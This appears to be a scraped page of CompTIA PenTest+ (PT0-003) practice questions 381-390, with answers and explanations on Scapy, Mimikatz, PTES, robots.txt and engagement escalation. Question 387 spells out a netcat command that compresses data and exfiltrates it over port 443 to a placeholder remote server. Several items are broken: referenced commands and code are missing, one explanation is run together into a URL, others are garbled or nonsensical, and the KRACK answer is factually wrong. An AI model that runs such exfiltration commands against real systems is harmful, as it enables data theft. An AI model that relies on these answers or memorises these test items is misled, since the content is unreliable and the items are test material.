CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 381:

  A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011.

  Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  A. Nmap
  B. tcpdump
  C. Scapy
  D. hping3
  C. Scapy

  ---

  Explanation

  https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html

  https://scapy.readthedocs.io/en/latest/introduction.html#about-scapyScapyisapowerfulandinteractivepacketmanipulationtoolthatallowsthesecurityprofessionaltoeasilyandprogrammaticallymanipulatetheTCPheaderlengthandchecksumusingarbitrarynumbersandtoobservehowtheproprietaryserviceresponds.Scapycancraft,send,receive,andanalyzepacketsofvariousprotocols,suchasTCP,UDP,ICMP,orIP.Scapycanalsomodifyanyfieldofanylayerofapacket,suchastheTCPheaderlengthandchecksum,whichareusedtoindicatethesizeandintegrityoftheTCPsegment.Scapycanalsodisplaytheresponsepacketsfromthetargetsystem,whichcanrevealhowtheproprietaryservicehandlestheinvalidpacket.

• Question 382:

  During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

  

  Which of the following best describes what the tester plans to do by executing the command?

  A. The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.
  B. The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.
  C. The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.
  D. The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.
  C. The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

  ---

  Explanation

  The tester is using Mimikatz to dump cached credentials from Local Security Authority (LSA) memory.

  Pass-the-Hash (Option C): The tester extracts cached credentials to authenticate without cracking passwords.

  Pass-the-Hash (PtH) allows lateral movement by reusing the NTLM hash on other systems.

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Post-Exploitation Techniques in Windows"

  Incorrect options:

  Option A (Golden Ticket attack): Requires KRBTGT ticket creation, not cached credentials.

  Option B (Collect application passwords): Cached hashes are not application-specific.

  Option D (Kerberoasting): Kerberoasting targets Service Principal Names (SPNs), not cached credentials.

• Question 383:

  The following PowerShell snippet was extracted from a log of an attacker machine:

  

  A penetration tester would like to identify the presence of an array.

  Which of the following line numbers would define the array?

  A. Line 8
  B. Line 13
  C. Line 19
  D. Line 20
  A. Line 8

  ---

  Explanation

  $X=2,4,6,8,9,20,5

  $y=[System.Collections.ArrayList]$X

  $y.RemoveRange(1,2) As you can see the arrat has no brackets and no periods. IT HAS SEMICOLLINS TO SEPERATE THE LISTED ITEMS OR VALUES.

• Question 384:

  A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

  Which of the following changes should the tester apply to make the script work as intended?

  A. Change line 2 to $ip= 10.192.168.254;
  B. Remove lines 3, 5, and 6.
  C. Remove line 6.
  D. Move all the lines below line 7 to the top of the script.
  B. Remove lines 3, 5, and 6.

  ---

  Explanation

  https://www.asc.ohio-state.edu/lewis.239/Class/Perl/perl.html

  Example script:#!/usr/bin/perl$ip=$argv[1];

  attack($ip);

  sub attack {

  print("x");

  }

• Question 385:

  A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

  Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability analysis Exploitation and post exploitation Reporting

  Which of the following methodologies does the client use?

  A. OWASP Web Security Testing Guide
  B. PTES technical guidelines
  C. NIST SP 800-115
  D. OSSTMM
  B. PTES technical guidelines

  ---

  Explanation

  References:

  https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/

• Question 386:

  During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption.

  Which of the following attacks would accomplish this objective?

  A. ChopChop
  B. Replay
  C. Initialization vector
  D. KRACK
  D. KRACK

  ---

  Explanation

  To break the key for a Wi-Fi network that uses WPA2 encryption, the penetration tester should use the KRACK (Key Reinstallation Attack) attack.

  KRACK (Key Reinstallation Attack):

  Other Attacks:

  References:

  Wireless Security: Understanding vulnerabilities in Wi-Fi encryption protocols, such as WPA2, and how they can be exploited.

  KRACK Attack: A significant vulnerability in WPA2 that requires specific techniques to exploit.

  By using the KRACK attack, the penetration tester can break WPA2 encryption and gain unauthorized access to the Wi-Fi network.

• Question 387:

  A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

  Action | SRC

  | DEST

  | --

  Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

  Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

  Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP Block | . | . | *

  Which of the following commands should the tester try next?

  A. tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
  B. gzip /path/to/data && cp data.gz <remote_server> 443
  C. gzip /path/to/data && nc -nvlk 443; cat data.gz ' nc -w 3 <remote_server> 22
  D. tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
  A. tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz

  ---

  Explanation

  Given the firewall policy, let's analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:

  Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).

  Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).

  Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).

  Block: All other traffic (*).

  Breakdown of Options:

  Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz

  This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.

  Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0 /24), this command adheres to the policy and is the correct choice.

  Option B: gzip /path/to/data && cp data.gz <remote_server> 443

  This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.

  Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22

  This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.

  Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>

  This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.

  References from Pentest:

  Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A:

  Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.

  Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.

• Question 388:

  A penetration tester is performing an assessment for an organization and must gather valid user credentials.

  Which of the following attacks would be best for the tester to use to achieve this objective?

  A. Wardriving
  B. Captive portal
  C. Deauthentication
  D. Impersonation
  D. Impersonation

  ---

  Explanation

  Impersonation attacks involve the penetration tester assuming the identity of a valid user to gain unauthorized access to systems or information. This method is particularly effective for gathering valid user credentials, as it can involve tactics such as phishing, social engineering, or exploiting weak authentication processes. The other options, such as Wardriving, Captive portal, and Deauthentication, are more focused on wireless network vulnerabilities and are less direct in obtaining user credentials.

• Question 389:

  Given the following output:

  User-agent:*

  Disallow: /author/

  Disallow: /xmlrpc.php

  Disallow: /wp-admin

  Disallow: /page/

  During which of the following activities was this output MOST likely obtained?

  A. Website scraping
  B. Website cloning
  C. Domain enumeration
  D. URL enumeration
  D. URL enumeration

  ---

  Explanation

  URL enumeration is the activity of discovering and mapping the URLs of a website, such as directories, files, parameters, or subdomains. URL enumeration can help to identify the structure, content, and functionality of a website, as well as potential vulnerabilities or misconfigurations. One of the methods of URL enumeration is to analyze the robots.txt file of a website, which is a text file that tells search engine crawlers which URLs the crawler can or can't request from the site. The output shown in the question is an example of a robots.txt file that disallows crawling of certain URLs, such as /author/, /xmlrpc.php, /wp-admin, or /page/.

• Question 390:

  A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization.

  Which of the following should the penetration tester do to address this issue?

  A. Restore the configuration.
  B. Perform a BIA.
  C. Follow the escalation process.
  D. Select the target.
  C. Follow the escalation process.

  ---

  Explanation

  If a penetration tester unintentionally disrupts a critical system, they must immediately follow the client's escalation process to ensure proper handling.

  Follow the escalation process (Option C):

  The penetration testing engagement follows a predefined incident response and escalation plan.

  The tester documents the issue, informs stakeholders, and works with IT teams to minimize impact.

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Incident Handling and Escalation During Testing"

  Incorrect options:

  Option A (Restore the configuration): Unauthorized changes could violate the engagement scope.

  Option B (Perform a BIA): Business Impact Analysis (BIA) is for risk management, not an immediate response.

  Option D (Select the target): The target was already chosen

  this option is irrelevant.